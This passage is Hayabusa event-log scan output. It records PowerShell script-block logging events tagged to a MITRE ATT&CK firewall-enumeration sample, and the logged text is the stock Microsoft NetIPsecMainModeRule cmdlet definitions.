= $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.817 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Enable-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( 
[Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = 
@(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Enable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.817 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Disable-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) 
DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) 
$__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') 